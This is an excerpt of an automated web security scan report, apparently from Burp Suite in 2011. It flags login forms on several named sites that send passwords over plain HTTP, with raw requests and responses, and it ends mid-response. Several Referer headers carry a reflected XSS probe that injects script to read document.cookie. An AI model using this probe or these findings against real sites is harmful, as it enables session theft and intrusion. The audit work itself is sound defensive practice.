Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:17:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=d66a2987255db43846a89be39f125365; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6392
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bookmerken | Seiten
...[SNIP]...
<div class="box" id="regbox">
               <form id="regform" method="post" action="loginajax.php">
                   <fieldset>
...[SNIP]...
</label>
                       <input id="password" name="password" type="password" value="" maxlength="20" /><br />
...[SNIP]...
7.13. http://www.brainify.com/Bookmark.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brainify.com
Path:   /Bookmark.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Bookmark.aspx HTTP/1.1
Host: www.brainify.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vghtpm45azchql55jeuls445; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Brainify - Boo
...[SNIP]...
<body style="background: #FFFFFF url(App_Themes/Default/Images/n2.gif) repeat-x scroll 0 1px;
margin: auto; width: 850px;" onload="self.focus();">
<form name="aspnetForm" method="post" action="Bookmark.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" style="min-height: 10em; display: table-cell;
vertical-align: middle; width: 850px; height: 560px;">
<div>
...[SNIP]...
</label>
<input name="textPassword" type="password" id="textPassword" tabindex="2" style="width:200px;" />
</div>
...[SNIP]...
7.14. http://www.cirip.ro/post/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cirip.ro
Path:   /post/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /post/ HTTP/1.1
Host: www.cirip.ro
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=20db396305a6b7733789ee1f379e1df3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=60, private, proxy-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34739

... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cirip.ro
...[SNIP]...
</table>
<form id="frmLogin" name="frmLogin" action="http://www.cirip.ro/post?url=&bookmark=" method="post">
<span class="sidebar_text">
...[SNIP]...
<br/>
<input name="entered_password" class="txtfield" size="20" type="password">
</span>
...[SNIP]...
7.15. http://www.classicalplace.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classicalplace.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.classicalplace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:21 GMT
Server: Apache/2.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=498c85a46e9fdd709306cc8ac3b33a7f; path=/
Set-Cookie: PHPSESSID=4e4cee578a4d6be3e988777fbbfb6ce3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv=
...[SNIP]...
</script>

<form id="loginForm" name="loginForm" method="post" action="http://www.classicalplace.com/" onsubmit="return onLogin();" style="margin:0px;">

<table width="243" height="254" border="0" cellpadding="0" cellspacing="0" style="background:url(template/loginbox/cp_loginbox.gif) no-repeat;">
...[SNIP]...
<td align="center" valign="middle" style="padding-right:7px;"><input class="inputLogin" type="password" name="pwd" id="pwd" style="width:140px;" /></td>
...[SNIP]...
7.16. http://www.colivia.de/login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colivia.de
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.php?return=/submit.php/1%22 HTTP/1.1
Host: www.colivia.de
Proxy-Connection: keep-alive
Referer: http://www.colivia.de/submit.php/1%22
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a21b075ab6ae7b749402f3acf5846f94; __utmz=79796357.1303061456.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/58; __utma=79796357.687729609.1303061456.1303061456.1303061456.1; __utmc=79796357; __utmb=79796357.1.10.1303061456

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 17:51:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 8302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<div class="login-left">
<form action="/login.php" id="thisform" method="post">
   <h2>
...[SNIP]...
<br />
           <input type="password" name="password" class="login" tabindex="11" /><br />
...[SNIP]...
7.17. http://www.colivia.de/submit.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colivia.de
Path:   /submit.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit.php HTTP/1.1
Host: www.colivia.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:26 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=f3473b1d0baded99c1bbe6cc0b0fe982; path=/
Connection: close
Content-Type: text/html
Content-Length: 13673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<div class="boxcontent">
   <form action="/login.php?return=/submit.php" method="post">
           Benutzername:<br />
...[SNIP]...
<br /><input type="password" name="password" class="login" tabindex="41" /><br />
...[SNIP]...
7.18. http://www.diglog.com/submit.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diglog.com
Path:   /submit.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit.aspx HTTP/1.1
Host: www.diglog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:16:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bpz3gqbfydia0f5514loz055; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 40697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" lang="zh-CN">
<head id="ct
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action id="aspnetForm" enctype="multipart/form-data">
<div>
...[SNIP]...
<input name="ctl00$ContentPlaceHolder1$tbLoginName" type="text" id="ctl00_ContentPlaceHolder1_tbLoginName" />
......:<input name="ctl00$ContentPlaceHolder1$tbPassword" type="password" id="ctl00_ContentPlaceHolder1_tbPassword" />
&nbsp;&nbsp;......<a href="Register.aspx?from=submit" target="_blank" class="new_window">
...[SNIP]...
7.19. http://www.drimio.com/drimthis/index  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.drimio.com
Path:   /drimthis/index

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /drimthis/index HTTP/1.1
Host: www.drimio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=2qtnujia5q1hqgs4svqlkp619644moos; path=/; domain=.drimio.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="icon" href="http://static.drimio.n
...[SNIP]...
<li class="form_login" style="display:none;">
       <form name="form_login" id="form_login" action="http://www.drimio.com/login" method="post">
           <ul>
...[SNIP]...
</label>
                   
                   <input type="password" name="login_password" id="login_password" tabindex="2" />
               </li>
...[SNIP]...
7.20. http://www.embarkons.com/sharer.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php HTTP/1.1
Host: www.embarkons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:43 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=gbg770phnl6gp5f4qddlhef3v6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:14:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...
7.21. http://www.embarkons.com/sharer.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php HTTP/1.1
Host: www.embarkons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:43 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=gbg770phnl6gp5f4qddlhef3v6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:14:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...
7.22. http://www.embarkons.com/sharer.php/a  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/a

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/a HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...
7.23. http://www.embarkons.com/sharer.php/a  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/a

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/a HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...
7.24. http://www.embarkons.com/sharer.php/images/close-icon.gif  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/close-icon.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/images/close-icon.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:16 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...
7.25. http://www.embarkons.com/sharer.php/images/close-icon.gif  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/close-icon.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/images/close-icon.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:16 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...
7.26. http://www.embarkons.com/sharer.php/images/postit-bulb.gif  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postit-bulb.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/images/postit-bulb.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:14 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...
7.27. http://www.embarkons.com/sharer.php/images/postit-bulb.gif  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postit-bulb.gif

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/images/postit-bulb.gif HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:14 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</h2>
<form name="register" id="frm_register" action="/src/new_register.php" method="post" autocomplete="off" onSubmit="return ValidateForm();" > <div class="form-align">
...[SNIP]...
</h1>
<input name="passwordreg" value="" type="password" class="textfiled" id="passwordreg" />
<div class="clear">
...[SNIP]...
7.28. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postitsubmitbtn.png

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/images/postitsubmitbtn.png HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:16 GMT; path=/
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
        <form method="post" onsubmit="return login_call();">
        <div>
...[SNIP]...
</h1>
               <input type="password" name="password" id="password" value="" class="textfiled"/>
               <div class="clear">
...[SNIP]...
7.29. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postitsubmitbtn.png

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /sharer.php/images/postitsubmitbtn.png HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:14 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
